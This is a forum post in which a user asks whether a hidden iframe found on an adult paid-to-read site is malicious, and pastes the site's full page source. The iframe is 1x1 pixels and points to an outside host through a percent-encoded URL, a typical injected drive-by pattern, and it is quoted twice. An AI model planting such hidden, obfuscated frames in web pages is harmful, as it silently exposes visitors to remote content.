Help - Search - Members - Calendar
Full Version: Looking for opinions on this please
Get Paid Forum - Get Paid Discussion > Get Paid To Programs > Sites Allegedly with problems of hacking/virus/0-iframes, autosearches etc ... > Nasties, trojans, 0iframes and downloads when surfing : Info and discussions
longshanks1971
Aug 13 2008, 09:41 AM
This site is an adult gpt and it mvent2 gives one alert,

The URL of the site is: hxxp://www.exciteptr.cxm/pages/index.php?refid=xxx

The frame producing the alert is;

CODE
<pre id="line47"><<span class="start-tag">iframe</span><span class="attribute-name"> src</span>=<span class="attribute-value">http://%75%6E%6F%74%6D%65%2E%69%6E%66%6F/%73%70/%69%6E%64%65%78%2E%70%68%70 </span><span class="attribute-name">width</span>=<span class="attribute-value">1 </span><span class="attribute-name">height</span>=<span class="attribute-value">1 </span><span class="attribute-name">frameborder</span>=<span class="attribute-value">0</span>></<span class="end-tag">iframe</span>></pre>


I know that these sites (adult sites in general not just adult gpt) can be the source of many nasties, so I'm not sure if this is virus code in Java or footprints from a hacker or even just a normall piece of code.

So can anybody shed any light on this for me and let me know if I'm way off the mark please?

Thanks for any info you can provide and the complete source code is below incase that helps;

CODE
<pre id="line1">
<span class="doctype"><!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"></span>
<<span class="start-tag">html</span>>
<<span class="start-tag">head</span>>
<<span class="start-tag">title</span>>ExcitePTR.com</<span class="end-tag">title</span>>
<<span class="start-tag">meta</span><span class="attribute-name"> name</span>=<span class="attribute-value">"keywords" </span><span class="attribute-name">content</span>=<span class="attribute-value">"Adult Content, Adult cams, Webcams, adult pictures, adult, sex, entertainment, adult ads, lesbians, sexual, exciting"</span>>
<<span class="start-tag">meta</span><span class="attribute-name"> name</span>=<span class="attribute-value">"description" </span><span class="attribute-name">content</span>=<span class="attribute-value">"Adult Entertainment!"</span>>
<<span class="start-tag">meta</span><span class="attribute-name"> name</span>=<span class="attribute-value">"robots" </span><span class="attribute-name">content</span>=<span class="attribute-value">"ALL"</span>>
<<span class="start-tag">meta</span><span class="attribute-name"> name</span>=<span class="attribute-value">"distribution" </span><span class="attribute-name">content</span>=<span class="attribute-value">"global"</span>>
<<span class="start-tag">meta</span><span class="attribute-name"> name</span>=<span class="attribute-value">"design-by" </span><span class="attribute-name">content</span>=<span class="attribute-value">"EzMarketing Enterprises"</span>>
<<span class="start-tag">meta</span><span class="attribute-name">  http-equiv</span>=<span class="attribute-value">Content-Type </span><span class="attribute-name">content</span>=<span class="attribute-value">"text/html; charset=windows-1252"</span>>
<<span class="start-tag">link</span><span class="attribute-name"> href</span>=<span class="attribute-value">"http://www.exciteptr.com/pages/style.css" </span><span class="attribute-name">rel</span>=<span class="attribute-value">"stylesheet" </span><span class="attribute-name">type</span>=<span class="attribute-value">"text/css"</span>>
<<span class="start-tag">script</span><span class="attribute-name"> language</span>=<span class="attribute-value">"JavaScript"</span>>
<!--
function MM_reloadPage(init) {  //reloads the window if Nav4 resized
if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) {
document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}
else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();
}
MM_reloadPage(true);
// -->
</<span class="end-tag">script</span>>
<<span class="start-tag">body</span><span class="attribute-name"> bgcolor</span>=<span class="attribute-value">"#0E1E61"</span>>
<<span class="start-tag">table</span><span class="attribute-name"> border</span>=<span class="attribute-value">"0" </span><span class="attribute-name">width</span>=<span class="attribute-value">"100%" </span><span class="attribute-name">cellspacing</span>=<span class="attribute-value">"0" </span><span class="attribute-name">cellpadding</span>=<span class="attribute-value">"0"</span>>
</pre><pre id="line25"><<span class="start-tag">tr</span><span class="attribute-name"> background</span>=<span class="attribute-value">"http://www.exciteptr.com/pages/bkg.gif"</span>>
<<span class="start-tag">td</span><span class="attribute-name"> width</span>=<span class="attribute-value">"0%" </span><span class="attribute-name">align</span>=<span class="attribute-value">"left" </span><span class="attribute-name">valign</span>=<span class="attribute-value">"top"</span>><<span class="start-tag">img</span><span class="attribute-name"> src</span>=<span class="attribute-value">"http://www.exciteptr.com/pages/blackstrips.jpg" </span><span class="attribute-name">width</span>=<span class="attribute-value">"20" </span><span class="attribute-name">height</span>=<span class="attribute-value">"150"</span>></<span class="end-tag">td</span>>

<<span class="start-tag">td</span><span class="attribute-name"> width</span>=<span class="attribute-value">"0%" </span><span class="attribute-name">background</span>=<span class="attribute-value">"http://www.exciteptr.com/pages/blackstrips.jpg" </span><span class="attribute-name">valign</span>=<span class="attribute-value">"top"</span>><<span class="start-tag">table</span><span class="attribute-name"> width</span>=<span class="attribute-value">"165" </span><span class="attribute-name">border</span>=<span class="attribute-value">"0" </span><span class="attribute-name">cellspacing</span>=<span class="attribute-value">"5" </span><span class="attribute-name">cellpadding</span>=<span class="attribute-value">"5" </span><span class="attribute-name">name</span>=<span class="attribute-value">"Logo_SiteName"</span>><<span class="start-tag">tr</span>><<span class="start-tag">td</span><span class="attribute-name"> nowrap</span>><<span class="start-tag">img</span><span class="attribute-name"> src</span>=<span class="attribute-value">"http://www.exciteptr.com/pages/e1.gif"</span>><<span class="start-tag">br</span>><<span class="start-tag">br</span>></<span class="end-tag">td</span>></<span class="end-tag">tr</span>></<span class="end-tag">table</span>></<span class="end-tag">td</span>>

<<span class="start-tag">td</span><span class="attribute-name"> width</span>=<span class="attribute-value">"100%" </span><span class="attribute-name">background</span>=<span class="attribute-value">"http://www.exciteptr.com/pages/blackstrips.jpg" </span><span class="attribute-name">valign</span>=<span class="attribute-value">"middle"</span>><<span class="start-tag">a</span><span class="attribute-name"> href</span>=<span class="attribute-value">"http://www.exciteptr.com/scripts/runner.php?BA=220&amp;hash=abd2c2296c8d839cdad5d5f9102707fe&amp;url=http%3A%2F%2Frushincense.com" </span><span class="attribute-name">target</span>=<span class="attribute-value">"_blank"</span>><<span class="start-tag">img</span><span class="attribute-name"> src</span>=<span class="attribute-value">"http://www.exciteptr.com/scripts/runner.php?REDIRECT=http%3A%2F%2Fwww.exciteptr.com%2Fimages%2Fbanner8.jpg%20&amp;hash=5ced44e8abba74457054005aeaa30291" </span><span class="attribute-name">alt</span>=<span class="attribute-value">""   </span><span class="attribute-name">border</span>=<span class="attribute-value">"0"</span>></<span class="end-tag">a</span>><<span class="start-tag">br</span>></<span class="end-tag">td</span>>

<<span class="start-tag">td</span><span class="attribute-name"> width</span>=<span class="attribute-value">"0%" </span><span class="attribute-name">align</span>=<span class="attribute-value">"right" </span><span class="attribute-name">valign</span>=<span class="attribute-value">"top"</span>><<span class="start-tag">img</span><span class="attribute-name"> src</span>=<span class="attribute-value">"http://www.exciteptr.com/pages/blackstrips.jpg" </span><span class="attribute-name">width</span>=<span class="attribute-value">"20" </span><span class="attribute-name">height</span>=<span class="attribute-value">"150"</span>></<span class="end-tag">td</span>>

</<span class="end-tag">tr</span>><<span class="start-tag">tr</span>>
  
<<span class="start-tag">td</span><span class="attribute-name"> align</span>=<span class="attribute-value">"center" </span><span class="attribute-name">colspan</span>=<span class="attribute-value">"4"</span>>
<<span class="start-tag">table</span><span class="attribute-name"> width</span>=<span class="attribute-value">"100%" </span><span class="attribute-name">border</span>=<span class="attribute-value">"0" </span><span class="attribute-name">cellspacing</span>=<span class="attribute-value">"0" </span><span class="attribute-name">cellpadding</span>=<span class="attribute-value">"0" </span><span class="attribute-name">name</span>=<span class="attribute-value">"Site Menu"</span>>
<<span class="start-tag">tr</span>>
<<span class="start-tag">td</span><span class="attribute-name"> align</span>=<span class="attribute-value">"center" </span><span class="attribute-name">height</span>=<span class="attribute-value">"21" </span><span class="attribute-name">bordercolor</span>=<span class="attribute-value">"#626FB7" </span><span class="attribute-name">background</span>=<span class="attribute-value">"http://www.exciteptr.com/pages/starryBackround.gif" </span><span class="attribute-name">class</span>=<span class="attribute-value">"menu"</span>>
<<span class="start-tag">A</span><span class="attribute-name"> HREF</span>=<span class="attribute-value">"http://www.exciteptr.com/pages/index.php" </span><span class="attribute-name">class</span>=<span class="attribute-value">"menu"</span>>Home</<span class="end-tag">A</span>>
</pre><pre id="line41">| <<span class="start-tag">A</span><span class="attribute-name"> HREF</span>=<span class="attribute-value">"http://www.exciteptr.com/pages/confirm.php" </span><span class="attribute-name">class</span>=<span class="attribute-value">"menu"</span>>Join</<span class="end-tag">A</span>>
| <<span class="start-tag">A</span><span class="attribute-name"> HREF</span>=<span class="attribute-value">"http://www.exciteptr.com/pages/advertise.php" </span><span class="attribute-name">class</span>=<span class="attribute-value">"menu"</span>>Advertise</<span class="end-tag">A</span>>
| <<span class="start-tag">A</span><span class="attribute-name"> HREF</span>=<span class="attribute-value">"http://www.exciteptr.com/pages/enter.php" </span><span class="attribute-name">class</span>=<span class="attribute-value">"menu"</span>>Members Lounge</<span class="end-tag">A</span>>
| <<span class="start-tag">A</span><span class="attribute-name"> HREF</span>=<span class="attribute-value">"http://www.exciteptr.com/pages/gold.php"  </span><span class="attribute-name">class</span>=<span class="attribute-value">"menu"</span>>Upgrade</<span class="end-tag">A</span>>
| <<span class="start-tag">A</span><span class="attribute-name"> HREF</span>=<span class="attribute-value">"http://www.exciteptr.com/pages/help.php" </span><span class="attribute-name">class</span>=<span class="attribute-value">"menu"</span>>Help</<span class="end-tag">A</span>>
| <<span class="start-tag">A</span><span class="attribute-name"> href</span>=<span class="attribute-value">"http://www.exciteptr.com/pages/advertiser_adstats.php" </span><span class="attribute-name">class</span>=<span class="attribute-value">"menu"</span>>Advertiser Login</<span class="end-tag">a</span>>
</pre><pre id="line47">| <<span class="start-tag">A</span><span class="attribute-name"> href</span>=<span class="attribute-value">"http://www.exciteptr.com/pages/stats.php" </span><span class="attribute-name">class</span>=<span class="attribute-value">"menu"</span>>Referral Contest</<span class="end-tag">a</span>>
</<span class="end-tag">td</span>></<span class="end-tag">tr</span>></<span class="end-tag">table</span>></<span class="end-tag">td</span>><<span class="start-tag">br</span>>


</<span class="end-tag">tr</span>><<span class="start-tag">tr</span><span class="attribute-name"> valign</span>=<span class="attribute-value">"top"</span>>

<<span class="start-tag">td</span><span class="attribute-name"> align</span>=<span class="attribute-value">"center" </span><span class="attribute-name">colspan</span>=<span class="attribute-value">"4"</span>>
<<span class="start-tag">table</span><span class="attribute-name"> border</span>=<span class="attribute-value">"0" </span><span class="attribute-name">width</span>=<span class="attribute-value">"100%" </span><span class="attribute-name">cellspacing</span>=<span class="attribute-value">"0" </span><span class="attribute-name">cellpadding</span>=<span class="attribute-value">"0" </span><span class="attribute-name">name</span>=<span class="attribute-value">"Body"</span>>
<<span class="start-tag">iframe</span><span class="attribute-name"> src</span>=<span class="attribute-value">http://%75%6E%6F%74%6D%65%2E%69%6E%66%6F/%73%70/%69%6E%64%65%78%2E%70%68%70 </span><span class="attribute-name">width</span>=<span class="attribute-value">1 </span><span class="attribute-name">height</span>=<span class="attribute-value">1 </span><span class="attribute-name">frameborder</span>=<span class="attribute-value">0</span>></<span class="end-tag">iframe</span>><<span class="start-tag">tr</span>>



<<span class="start-tag">td</span><span class="attribute-name"> valign</span>=<span class="attribute-value">"top" </span><span class="attribute-name">bordercolor</span>=<span class="attribute-value">"#CCCCCC" </span><span class="attribute-name">width</span>=<span class="attribute-value">"100%" </span><span class="attribute-name">align</span>=<span class="attribute-value">"left"</span>>
<<span class="start-tag">br</span>>
<<span class="start-tag">br</span>>
<span class="comment"><!--Begin Body Content --></span>

<<span class="start-tag">table</span><span class="attribute-name"> width</span>=<span class="attribute-value">"100%" </span><span class="attribute-name">border</span>=<span class="attribute-value">"0" </span><span class="attribute-name">cellspacing</span>=<span class="attribute-value">"5" </span><span class="attribute-name">cellpadding</span>=<span class="attribute-value">"5" </span><span class="attribute-name">align</span>=<span class="attribute-value">"CENTER"</span>>
</pre><pre id="line65"><<span class="start-tag">tr</span>><<span class="start-tag">center</span>><<span class="start-tag">b</span>><<span class="start-tag">font</span><span class="attribute-name"> color</span>=<span class="attribute-value">"CC99FF"</span>>ADULTS ONLY E-Zine THE FUNS JUST BEGINNING!    <<span class="start-tag">center</span>>
   <<span class="start-tag">table</span><span class="attribute-name"> border</span>=<span class="attribute-value">"1" </span><span class="attribute-name">cellpadding</span>=<span class="attribute-value">"0" </span><span class="attribute-name">cellspacing</span>=<span class="attribute-value">"0" </span><span class="attribute-name">style</span>=<span class="attribute-value">"border-collapse: collapse" </span><span class="attribute-name">bordercolor</span>=<span class="attribute-value">"#111111" </span><span class="attribute-name">width</span>=<span class="attribute-value">"100%" </span><span class="attribute-name">id</span>=<span class="attribute-value">"AutoNumber1" </span><span class="attribute-name">height</span>=<span class="attribute-value">"370" </span><span class="attribute-name">bgcolor</span>=<span class="attribute-value">"#000000"</span>>
<<span class="start-tag">head</span>>
<<span class="start-tag">meta</span><span class="attribute-name"> http-equiv</span>=<span class="attribute-value">"Content-Type" </span><span class="attribute-name">content</span>=<span class="attribute-value">"text/html; charset=windows-1252"</span>>
<<span class="start-tag">title</span>>New Page 1</<span class="end-tag">title</span>>
</<span class="end-tag">head</span>>

<<span class="start-tag">body</span><span class="attribute-name"> link</span>=<span class="attribute-value">"#0000FF" </span><span class="attribute-name">vlink</span>=<span class="attribute-value">"#FFFF00" </span><span class="attribute-name">alink</span>=<span class="attribute-value">"#FF0000" </span><span class="attribute-name">text</span>=<span class="attribute-value">"#000080" </span><span class="attribute-name">bgcolor</span>=<span class="attribute-value">"#000000"</span>>

<<span class="start-tag">table</span><span class="attribute-name"> border</span>=<span class="attribute-value">"1" </span><span class="attribute-name">width</span>=<span class="attribute-value">"100%" </span><span class="attribute-name">id</span>=<span class="attribute-value">"table1" </span><span class="attribute-name">height</span>=<span class="attribute-value">"405"</span>>
    <<span class="start-tag">tr</span>>
        <<span class="start-tag">td</span>>
</pre><pre id="line77">        <<span class="start-tag">p</span><span class="attribute-name"> align</span>=<span class="attribute-value">"center"</span>>
        <<span class="start-tag">IMG</span><span class="attribute-name"> SRC</span>=<span class="attribute-value">"http://www.exciteptr.com/pages/105-0513_IMG.jpg" </span><span class="attribute-name">width</span>=<span class="attribute-value">"239" </span><span class="attribute-name">height</span>=<span class="attribute-value">"320"</span>></<span class="end-tag">td</span>>
        <<span class="start-tag">td</span>>
        <<span class="start-tag">p</span><span class="attribute-name"> align</span>=<span class="attribute-value">"center"</span>>
        <<span class="start-tag">IMG</span><span class="attribute-name"> SRC</span>=<span class="attribute-value">"http://www.exciteptr.com/pages/aid-toilet047.jpg" </span><span class="attribute-name">width</span>=<span class="attribute-value">"239" </span><span class="attribute-name">height</span>=<span class="attribute-value">"320"</span>></<span class="end-tag">td</span>>
    </<span class="end-tag">tr</span>>
    <<span class="start-tag">tr</span>>
        <<span class="start-tag">td</span>>
        <<span class="start-tag">p</span><span class="attribute-name"> align</span>=<span class="attribute-value">"center"</span>>
</pre><pre id="line86">        <<span class="start-tag">IMG</span><span class="attribute-name"> SRC</span>=<span class="attribute-value">"http://www.exciteptr.com/pages/deedee003.jpg" </span><span class="attribute-name">width</span>=<span class="attribute-value">"220" </span><span class="attribute-name">height</span>=<span class="attribute-value">"319"</span>></<span class="end-tag">td</span>>
        <<span class="start-tag">td</span>>
        <<span class="start-tag">p</span><span class="attribute-name"> align</span>=<span class="attribute-value">"center"</span>><<span class="start-tag">b</span>><<span class="start-tag">font</span><span class="attribute-name"> size</span>=<span class="attribute-value">"5" </span><span class="attribute-name">color</span>=<span class="attribute-value">"#FF0000"</span>>Models&<span class="entity">nbsp;</span> Wanted!</<span class="end-tag">font</span>></<span class="end-tag">b</span>></<span class="end-tag">p</span>>
        <<span class="start-tag">p</span><span class="attribute-name"> align</span>=<span class="attribute-value">"center"</span>><<span class="start-tag">font</span><span class="attribute-name"> color</span>=<span class="attribute-value">"#FFFFFF"</span>>Females and males, as well as
        couples!</<span class="end-tag">font</span>></<span class="end-tag">p</span>>
        <<span class="start-tag">p</span><span class="attribute-name"> align</span>=<span class="attribute-value">"center"</span>><<span class="start-tag">font</span><span class="attribute-name"> color</span>=<span class="attribute-value">"#FFFFFF"</span>>Up to $1.50 usd per photo!</<span class="end-tag">font</span>></<span class="end-tag">p</span>>
        <<span class="start-tag">p</span><span class="attribute-name"> align</span>=<span class="attribute-value">"center"</span>><<span class="start-tag">font</span><span class="attribute-name"> color</span>=<span class="attribute-value">"#FFFFFF"</span>>Video up to $3.00 usd per
        minute!</<span class="end-tag">font</span>></<span class="end-tag">p</span>>
</pre><pre id="line94">        <<span class="start-tag">p</span><span class="attribute-name"> align</span>=<span class="attribute-value">"center"</span>><<span class="start-tag">font</span><span class="attribute-name"> color</span>=<span class="attribute-value">"#FFFFFF"</span>>Send samples and all inquiries
        to:</<span class="end-tag">font</span>></<span class="end-tag">p</span>>
        <<span class="start-tag">p</span><span class="attribute-name"> align</span>=<span class="attribute-value">"center"</span>><<span class="start-tag">font</span><span class="attribute-name"> color</span>=<span class="attribute-value">"#FFFFFF"</span>>
        <<span class="start-tag">a</span><span class="attribute-name"> href</span>=<span class="attribute-value">"mailto:apply@exciteptr.com"</span>>APPLY@Exciteptr.com</<span class="end-tag">a</span>></<span class="end-tag">font</span>></<span class="end-tag">td</span>>
    </<span class="end-tag">tr</span>>
    <<span class="start-tag">tr</span>>
        <<span class="start-tag">td</span>>&<span class="entity">nbsp;</span></<span class="end-tag">td</span>>
        <<span class="start-tag">td</span>>&<span class="entity">nbsp;</span></<span class="end-tag">td</span>>
    </<span class="end-tag">tr</span>>
</pre><pre id="line103"></<span class="end-tag">table</span>>

</<span class="end-tag">body</span>>

    
       <<span class="start-tag">center</span>>
<<span class="start-tag">script</span><span class="attribute-name"> language</span>=<span class="attribute-value">"JavaScript" </span><span class="attribute-name">type</span>=<span class="attribute-value">"text/javascript"</span>>
<!--
ctxt_ad_partner = "1060495770";
ctxt_ad_section = "";
ctxt_ad_bg = "";
ctxt_ad_width = 728;
ctxt_ad_height = 90;
ctxt_ad_bc = "CC33CC";
ctxt_ad_cc = "333333";
ctxt_ad_lc = "CC66FF";
ctxt_ad_tc = "33FF33";
ctxt_ad_uc = "FFFFFF";
// -->
</<span class="end-tag">script</span>>
<<span class="start-tag">script</span><span class="attribute-name"> language</span>=<span class="attribute-value">"JavaScript" </span><span class="attribute-name">src</span>=<span class="attribute-value">"http://ypn-js.overture.com/partner/js/ypn.js"</span>>
</<span class="end-tag">script</span>>
<<span class="start-tag">br</span>>
<<span class="start-tag">br</span>>
<<span class="start-tag">A</span><span class="attribute-name"> HREF</span>=<span class="attribute-value">"http://www.exciteptr.com/pages/advertise.php"</span>><<span class="start-tag">font</span><span class="attribute-name"> color</span>=<span class="attribute-value">"#CC99FF"</span>><<span class="start-tag">b</span>>Advertiser's Area</<span class="end-tag">b</span>></<span class="end-tag">font</span>></<span class="end-tag">A</span>>
<<span class="start-tag">br</span>>
<<span class="start-tag">br</span>>
<<span class="start-tag">body</span><span class="attribute-name"> background</span>=<span class="attribute-value">"000000"</span>>
</pre><pre id="line131"></<span class="end-tag">body</span>>
</<span class="end-tag">td</span>>
</<span class="end-tag">tr</span>>
<<span class="start-tag">br</span>>

<span class="comment"><!--End Body Content --></span>
</<span class="end-tag">td</span>>

<<span class="start-tag">td</span><span class="attribute-name"> valign</span>=<span class="attribute-value">"top" </span><span class="attribute-name">width</span>=<span class="attribute-value">"0%" </span><span class="attribute-name">bgcolor</span>=<span class="attribute-value">"#000000"</span>>
<<span class="start-tag">table</span><span class="attribute-name"> height</span>=<span class="attribute-value">100% </span><span class="attribute-name">cellpadding</span>=<span class="attribute-value">"0" </span><span class="attribute-name">cellspacing</span>=<span class="attribute-value">"0" </span><span class="attribute-name">width</span>=<span class="attribute-value">"155" </span><span class="attribute-name">name</span>=<span class="attribute-value">"Right Side Links" </span>>
<<span class="start-tag">tr</span>>

</<span class="end-tag">tr</span>></<span class="end-tag">table</span>></<span class="end-tag">td</span>>

</<span class="end-tag">tr</span>></<span class="end-tag">table</span>></<span class="end-tag">td</span>>
</<span class="end-tag">tr</span>></<span class="end-tag">table</span>></<span class="end-tag">td</span>>
</pre><pre id="line148"><<span class="start-tag">td</span><span class="attribute-name"> valign</span>=<span class="attribute-value">"top" </span><span class="attribute-name">width</span>=<span class="attribute-value">"0%" </span><span class="attribute-name">bgcolor</span>=<span class="attribute-value">"#000000"</span>></<span class="end-tag">td</span>>

</<span class="end-tag">tr</span>><<span class="start-tag">tr</span>>
<<span class="start-tag">tr</span>>
     <<span class="start-tag">td</span><span class="attribute-name"> width</span>=<span class="attribute-value">"100%" </span><span class="attribute-name">height</span>=<span class="attribute-value">"132" </span><span class="attribute-name">colspan</span>=<span class="attribute-value">"3" </span><span class="attribute-name">bgcolor</span>=<span class="attribute-value">"#000000"</span>>
     <<span class="start-tag">div</span><span class="attribute-name"> align</span>=<span class="attribute-value">"center"</span>>
   <<span class="start-tag">center</span>>
   <<span class="start-tag">table</span><span class="attribute-name"> border</span>=<span class="attribute-value">"1" </span><span class="attribute-name">cellpadding</span>=<span class="attribute-value">"0" </span><span class="attribute-name">cellspacing</span>=<span class="attribute-value">"0" </span><span class="attribute-name">style</span>=<span class="attribute-value">"border-collapse: collapse" </span><span class="attribute-name">bordercolor</span>=<span class="attribute-value">"#CA00CA" </span><span class="attribute-name">width</span>=<span class="attribute-value">"75%" </span><span class="attribute-name">id</span>=<span class="attribute-value">"AutoNumber1" </span><span class="attribute-name">bgcolor</span>=<span class="attribute-value">"#000000" </span><span class="attribute-name">height</span>=<span class="attribute-value">"221"</span>>
     <<span class="start-tag">tr</span>>
       <<span class="start-tag">td</span><span class="attribute-name"> width</span>=<span class="attribute-value">"100%" </span><span class="attribute-name">align</span>=<span class="attribute-value">"center" </span><span class="attribute-name">colspan</span>=<span class="attribute-value">"4" </span><span class="attribute-name">bordercolor</span>=<span class="attribute-value">"#CA00CA" </span><span class="attribute-name">bgcolor</span>=<span class="attribute-value">"#660066" </span><span class="attribute-name">height</span>=<span class="attribute-value">"18"</span>>
</pre><pre id="line159">      <<span class="start-tag">b</span>><<span class="start-tag">font</span><span class="attribute-name"> face</span>=<span class="attribute-value">"Trebuchet MS" </span><span class="attribute-name">size</span>=<span class="attribute-value">"2" </span><span class="attribute-name">color</span>=<span class="attribute-value">"#E1DBF2"</span>>NEW!&<span class="entity">nbsp;</span> LINK SWAP
       - Click <<span class="start-tag">a</span><span class="attribute-name"> href</span>=<span class="attribute-value">"http://exciteptr.com/pages/linkswap.php"</span>>HERE </<span class="end-tag">a</span>>to
       submit your link!</<span class="end-tag">font</span>></<span class="end-tag">b</span>></<span class="end-tag">td</span>>
     </<span class="end-tag">tr</span>>
     <<span class="start-tag">tr</span>>
       <<span class="start-tag">td</span><span class="attribute-name"> width</span>=<span class="attribute-value">"25%" </span><span class="attribute-name">align</span>=<span class="attribute-value">"center" </span><span class="attribute-name">bordercolor</span>=<span class="attribute-value">"#CA00CA" </span><span class="attribute-name">height</span>=<span class="attribute-value">"33"</span>><<span class="start-tag">a</span><span class="attribute-name"> href</span>=<span class="attribute-value">"http://play-palace.com"</span>>The Play Palace</<span class="end-tag">a</span>></<span class="end-tag">td</span>>
       <<span class="start-tag">td</span><span class="attribute-name"> width</span>=<span class="attribute-value">"25%" </span><span class="attribute-name">align</span>=<span class="attribute-value">"center" </span><span class="attribute-name">bordercolor</span>=<span class="attribute-value">"#CA00CA" </span><span class="attribute-name">height</span>=<span class="attribute-value">"33"</span>><<span class="start-tag">a</span><span class="attribute-name"> href</span>=<span class="attribute-value">"http://blog.iandron.cn"</span>>Iandron</<span class="end-tag">a</span>></<span class="end-tag">td</span>>
</pre><pre id="line166">      <<span class="start-tag">td</span><span class="attribute-name"> width</span>=<span class="attribute-value">"25%" </span><span class="attribute-name">align</span>=<span class="attribute-value">"center" </span><span class="attribute-name">bordercolor</span>=<span class="attribute-value">"#CA00CA" </span><span class="attribute-name">height</span>=<span class="attribute-value">"33"</span>><<span class="start-tag">a</span><span class="attribute-name"> href</span>=<span class="attribute-value">"http://crowlink.profusehost.net/gptr"</span>>Earn from 0.01 to $250</<span class="end-tag">a</span>></<span class="end-tag">td</span>>
       <<span class="start-tag">td</span><span class="attribute-name"> width</span>=<span class="attribute-value">"25%" </span><span class="attribute-name">align</span>=<span class="attribute-value">"center" </span><span class="attribute-name">bordercolor</span>=<span class="attribute-value">"#CA00CA" </span><span class="attribute-name">height</span>=<span class="attribute-value">"33"</span>>&<span class="entity">nbsp;</span></<span class="end-tag">td</span>>
     </<span class="end-tag">tr</span>>
     <<span class="start-tag">tr</span>>
       <<span class="start-tag">td</span><span class="attribute-name"> width</span>=<span class="attribute-value">"25%" </span><span class="attribute-name">align</span>=<span class="attribute-value">"center" </span><span class="attribute-name">bordercolor</span>=<span class="attribute-value">"#CA00CA" </span><span class="attribute-name">height</span>=<span class="attribute-value">"33"</span>>&<span class="entity">nbsp;</span></<span class="end-tag">td</span>>
       <<span class="start-tag">td</span><span class="attribute-name"> width</span>=<span class="attribute-value">"25%" </span><span class="attribute-name">align</span>=<span class="attribute-value">"center" </span><span class="attribute-name">bordercolor</span>=<span class="attribute-value">"#CA00CA" </span><span class="attribute-name">height</span>=<span class="attribute-value">"33"</span>>&<span class="entity">nbsp;</span></<span class="end-tag">td</span>>
       <<span class="start-tag">td</span><span class="attribute-name"> width</span>=<span class="attribute-value">"25%" </span><span class="attribute-name">align</span>=<span class="attribute-value">"center" </span><span class="attribute-name">bordercolor</span>=<span class="attribute-value">"#CA00CA" </span><span class="attribute-name">height</span>=<span class="attribute-value">"33"</span>>&<span class="entity">nbsp;</span></<span class="end-tag">td</span>>
       <<span class="start-tag">td</span><span class="attribute-name"> width</span>=<span class="attribute-value">"25%" </span><span class="attribute-name">align</span>=<span class="attribute-value">"center" </span><span class="attribute-name">bordercolor</span>=<span class="attribute-value">"#CA00CA" </span><span class="attribute-name">height</span>=<span class="attribute-value">"33"</span>>&<span class="entity">nbsp;</span></<span class="end-tag">td</span>>
</pre><pre id="line174">    </<span class="end-tag">tr</span>>
     <<span class="start-tag">tr</span>>
       <<span class="start-tag">td</span><span class="attribute-name"> width</span>=<span class="attribute-value">"25%" </span><span class="attribute-name">align</span>=<span class="attribute-value">"center" </span><span class="attribute-name">bordercolor</span>=<span class="attribute-value">"#CA00CA" </span><span class="attribute-name">height</span>=<span class="attribute-value">"33"</span>>&<span class="entity">nbsp;</span></<span class="end-tag">td</span>>
       <<span class="start-tag">td</span><span class="attribute-name"> width</span>=<span class="attribute-value">"25%" </span><span class="attribute-name">align</span>=<span class="attribute-value">"center" </span><span class="attribute-name">bordercolor</span>=<span class="attribute-value">"#CA00CA" </span><span class="attribute-name">height</span>=<span class="attribute-value">"33"</span>>&<span class="entity">nbsp;</span></<span class="end-tag">td</span>>
       <<span class="start-tag">td</span><span class="attribute-name"> width</span>=<span class="attribute-value">"25%" </span><span class="attribute-name">align</span>=<span class="attribute-value">"center" </span><span class="attribute-name">bordercolor</span>=<span class="attribute-value">"#CA00CA" </span><span class="attribute-name">height</span>=<span class="attribute-value">"33"</span>>&<span class="entity">nbsp;</span></<span class="end-tag">td</span>>
       <<span class="start-tag">td</span><span class="attribute-name"> width</span>=<span class="attribute-value">"25%" </span><span class="attribute-name">align</span>=<span class="attribute-value">"center" </span><span class="attribute-name">bordercolor</span>=<span class="attribute-value">"#CA00CA" </span><span class="attribute-name">height</span>=<span class="attribute-value">"33"</span>>&<span class="entity">nbsp;</span></<span class="end-tag">td</span>>
     </<span class="end-tag">tr</span>>
     <<span class="start-tag">tr</span>>
       <<span class="start-tag">td</span><span class="attribute-name"> width</span>=<span class="attribute-value">"25%" </span><span class="attribute-name">align</span>=<span class="attribute-value">"center" </span><span class="attribute-name">bordercolor</span>=<span class="attribute-value">"#CA00CA" </span><span class="attribute-name">height</span>=<span class="attribute-value">"34"</span>>&<span class="entity">nbsp;</span></<span class="end-tag">td</span>>
</pre><pre id="line183">      <<span class="start-tag">td</span><span class="attribute-name"> width</span>=<span class="attribute-value">"25%" </span><span class="attribute-name">align</span>=<span class="attribute-value">"center" </span><span class="attribute-name">bordercolor</span>=<span class="attribute-value">"#CA00CA" </span><span class="attribute-name">height</span>=<span class="attribute-value">"34"</span>>&<span class="entity">nbsp;</span></<span class="end-tag">td</span>>
       <<span class="start-tag">td</span><span class="attribute-name"> width</span>=<span class="attribute-value">"25%" </span><span class="attribute-name">align</span>=<span class="attribute-value">"center" </span><span class="attribute-name">bordercolor</span>=<span class="attribute-value">"#CA00CA" </span><span class="attribute-name">height</span>=<span class="attribute-value">"34"</span>>&<span class="entity">nbsp;</span></<span class="end-tag">td</span>>
       <<span class="start-tag">td</span><span class="attribute-name"> width</span>=<span class="attribute-value">"25%" </span><span class="attribute-name">align</span>=<span class="attribute-value">"center" </span><span class="attribute-name">bordercolor</span>=<span class="attribute-value">"#CA00CA" </span><span class="attribute-name">height</span>=<span class="attribute-value">"34"</span>>&<span class="entity">nbsp;</span></<span class="end-tag">td</span>>
     </<span class="end-tag">tr</span>>
     <<span class="start-tag">tr</span>>
       <<span class="start-tag">td</span><span class="attribute-name"> width</span>=<span class="attribute-value">"25%" </span><span class="attribute-name">align</span>=<span class="attribute-value">"center" </span><span class="attribute-name">bordercolor</span>=<span class="attribute-value">"#CA00CA" </span><span class="attribute-name">height</span>=<span class="attribute-value">"34"</span>>&<span class="entity">nbsp;</span></<span class="end-tag">td</span>>
       <<span class="start-tag">td</span><span class="attribute-name"> width</span>=<span class="attribute-value">"25%" </span><span class="attribute-name">align</span>=<span class="attribute-value">"center" </span><span class="attribute-name">bordercolor</span>=<span class="attribute-value">"#CA00CA" </span><span class="attribute-name">height</span>=<span class="attribute-value">"34"</span>>&<span class="entity">nbsp;</span></<span class="end-tag">td</span>>
